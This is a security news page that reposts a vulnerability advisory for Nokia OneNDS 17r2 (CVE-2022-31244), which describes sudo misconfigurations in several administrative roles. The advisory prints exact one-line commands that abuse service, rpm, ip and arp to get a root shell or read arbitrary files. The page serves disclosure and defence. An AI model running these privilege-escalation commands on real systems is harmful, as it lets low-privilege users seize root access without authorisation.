Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-31244: Nokia OneNDS 17 Insecure Permissions

Nokia OneNDS 17r2 has Insecure Permissions vulnerability that allows for privilege escalation.

CVE
#vulnerability#nokia
===============================================================================             title: Incorrect Permission Assignment           product: Nokia OneNDS 17vulnerability type: Security Misconfiguration          severity: High        CVSS Score: 7.8       CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H          found on: 31/03/2022                by: Giacomo Sighinolfi, Milena Mangiola,                     Savino Sisco, Valerio Casalino               cve: CVE-2022-31244===============================================================================Some sudo permissions can be exploited by the users that have specific rolesto escalate to root privileges and execute arbitrary commands on the system.The affected roles are:ONENDS_CC_BASIC_ADMIN:  - it can run /sbin/service  - can be exploited using `sudo /sbin/service ../../bin/sh`ONENDS_CC_SERVICE_ADMIN:  - it can run /bin/rpm  - can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`ONENDS_CC_NETWORK_MANAGEMENT:  - it can run /sbin/ip,/sbin/arp  - can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'` - can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`===============================================================================

Related news

Nokia OneNDS 17 Insecure Permissions / Privilege Escalation

Nokia OneNDS 17 has loose sudo permissions that can allow users to escalate privileges.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907